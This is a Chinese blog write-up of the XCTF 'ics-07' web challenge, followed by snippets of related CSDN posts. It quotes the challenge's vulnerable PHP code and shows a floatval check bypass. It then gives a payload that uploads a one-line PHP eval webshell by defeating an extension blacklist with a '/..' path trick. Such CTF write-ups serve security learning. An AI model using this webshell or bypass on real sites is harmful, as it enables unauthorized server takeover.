XCTF-ics-07(floatval函数特性+Linux目录结构特性)

最新推荐文章于 2024-11-13 22:29:30 发布
最新推荐文章于 2024-11-13 22:29:30 发布
阅读量34 收藏
点赞数
文章标签: linux android adb 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43335965/article/details/133012329
版权

直接进入到项目管理页面,给了三段源码。

第一段
<?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>
第二段

在$_SESSION['admin'] = True的情况下,POST提交con和file两个参数,对$filename进行正则判断,如果判断正确文件会被上传到uploaded/backup目录下。正则匹配这里的把一些后缀加入了黑名单

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>
第三段

这一段可以使$_SESSION['admin'] = True;我们来看一下怎么构造。他需要获取一个id参数, 并且id不为1,且最后一位等于9。
这里用到了floatval这个函数,floatval 函数用于获取变量的浮点值,但是floatval在遇到字符时会截断后面的部分,比如-,+,空格等,所以可以构造id=1 9来满足第一个if条件,if条件满足可以使得$result变量为TRUE。成功使$_SESSION['admin'] = True;

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]); //利用mysql_real_escape_string函数防止SQL注入,将传入语句中的特殊字符转义,可以使用宽字节注入,但是需要GBK编码
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>
构造payload

下面考虑如何上传木马文件。这里利用Linux的一个目录结构特性。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹
构造payload:

con=<?php @eval($_POST[cmd]);?>&file=test.php/1.php/..


成功上传木马。
蚁剑连接拿到flag

参考链接

https://www.guildhab.top/?p=481

Held0
关注
XCTFics-07
小白渣的博客
10-28 2324
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
xctf-web-ics07
zhejichensha_l7l的博客
02-19 316
文章目录瞎分析过程二、使用步骤1.引入库2.读入数据总结 瞎分析 感觉就是道php代码审计+文件上传题目 (可能有错,请各位哥哥姐姐们指点指点) 过程 代码如下(示例): <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php
[XCTF] ics-07 WP
m0_57131590的博客
09-10 152
进入页面,一通乱点发现除了项目管理之外其他页面没反应 然后提示我们进入view-source.php, 进入之后则是一页代码 <!DOCTYPEhtml> <html> <head> <metacharset="utf-8"> <title>cetc7</title> </head> <body> <?php session_star...
xctf攻防世界 Web高手进阶区 ics-07
l8947943的博客
01-01 636
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 分析问题 这个题还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解题的重要参数。 开始分析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
XCTF-ics-07
臭nana的博客
12-17 473
题目描述:工控云管理系统项目管理页面解析漏洞 打开题目网址,点击项目管理 进来之后,发现页面下方有一个view-source 点击之后得到页面源码 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title&...
XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
[XCTF]ics-07
sGanYu
09-01 1182
工控云管理系统项目管理页面解析漏洞 打开链接,一个工控云管理系统,随意点击旁边的菜单,发现只有云平台项目管理中心可以进入 初始页面只有一个,可以找到一个view-source,点进去可以看到源码 考点:php代码审计、中间件解析漏洞、上传一句话木马连接 PHP代码审计 代码一共分为三部分 第一部分:提交的get参数page不为index.php即可 <?php session_start();//在用户登陆成功后,将用户特定标识存储到 sessio...
XCTF-HW-pipeline附件
11-09
附件
#XCTF整理#ics-06
vircorns的博客
09-17 422
做题地址 知识点 BurpSuite的基础用法 wp 进入发现只有报表中心能点进去 注意:他的url传进了参数 猜测id等于某一个值时,可能会有所改变 因此用bp爆破,发现2333是回显不一致 令id=2333,得到flag ...
Linux:网络协议socket
Au_ust的博客
11-05 1483
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Xshell,Shell的相关介绍与Linux中的权限问题
2301_81265915的博客
11-09 728
首先,先介绍一下我们学习Linux的工具:XshellXShell 是一个流行的 Windows 平台上的 SSH、Telnet 和 Rlogin 客户端,主要用于远程连接 Linux/Unix 系统。它的运行原理大致如下:1:协议支持: XShell 支持多种远程协议(如 SSH、Telnet、Rlogin 等)。最常用的是 SSH 协议,它提供了安全的加密通信。SSH(Secure Shell)通过加密对客户端和服务器之间的通信进行保护,以防止数据在网络中被窃听和篡改。2:建立连接。
Linux】阿里云服务器搭建gradio实例
最新发布
Explore_Zhou
11-13 1045
因为课程原因,需要做一个大模型相关的大作业,想到之前买的阿里云服务器,便想在服务器基于大模型API部署一个聊天机器人。因为是新手,特地做个记录,供初学者参考。从上面安装的几个软件来看,其实Linux端安装软件还是有规律可循的,主要就是那么几步:configure,make,make installlink1link2。
gdb编译教程(支持linux下X86和ARM架构)
weixin_43246170的博客
11-12 220
5、我们先开始x86版本,这个比较简单,不需要配置交叉编译工具(当然前提是系统装了gcc和g++的环境啊)。将gdb文件拷贝到对应平台下,即可使用。(或者使用gdbserver远程调试)以上这些配置都是要跟在./configure后面的。3、解压,然后进入到目录下,打开当前目录的命令行窗口。2、下载完后拷贝到linux的x86系统。先清理下编译x86残留下的临时文件。6、限制我们来编译ARM版本。4、创建一个生成目录。我下载的8.2版本。
连接实验室服务器并创建虚拟环境,从本地上传文件到linux服务器,使用requirement.txt安装环境需要的依赖的方法及下载缓慢的解决方法(Linux)
aha_xigua的博客
11-12 380
现在你已经成功创建并激活了一个新的conda环境。如果返回了版本信息,说明conda已经安装。如果没有安装,你需要先安装conda。创建一个新的conda环境。在你的个人计算机上打开终端(命令行界面)。输入密码后,你将成功连接到实验室服务器。三、利用conda创建环境。
Linux】内核模版加载modprobe | lsmod
binqian的专栏
11-13 235
modprobe是一个强大的工具,用于管理和操作 Linux 内核模块。通过使用modprobe,您可以轻松地加载、卸载和管理模块,确保系统在需要时能够正确加载所需的模块。
Linux ssh 基础教程
tangPHP的博客
11-13 756
SSH是一种安全协议,用作远程连接Linux服务器的主要手段。它通过生成远程shell提供基于文本的界面。连接之后,在本地终端中键入的所有命令都将发送到远程服务器并在那里执行,一般说ssh即openssh。OpenSSH(Open Secure Shell),是一套安全的网络工具,它在不安全的网络上提供加密通信。它主要用于安全远程登录、文件传输和其他安全网络服务。
初识Linux · 消息队列和信号量
更新各种计算机技能~
11-13 394
对于消息队列,信号量,共享内存都是隶属于system V这个标准下的进程间通信,其实上文的共享内存已经是基本上快被淘汰的了,对于其他的两个,消息队列和信号量,我们这里主要是以介绍为主,怎么具体的使用就暂时先不介绍了,主要是通过原理和函数部分进行介绍。并且其实在网络部分,也会重新介绍信号量,所以这里我们主要是了解即可。
linux 下查看程序启动的目录
qq_39763510的博客
11-11 187
第一步、ps -ef | grep azkaban 查询出进程号。第二步、cd /proc/第三步 、cd 进程号。第四部 ll 查看详情。以azkaban为例。
Linux自定义终端提示符
Lenn Louis' Scribe
11-13 539
序列 显示值\a\d\h\H\j\l\n\r\s\t\T\@\A\u\v\V\w\W\#\$\[\]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值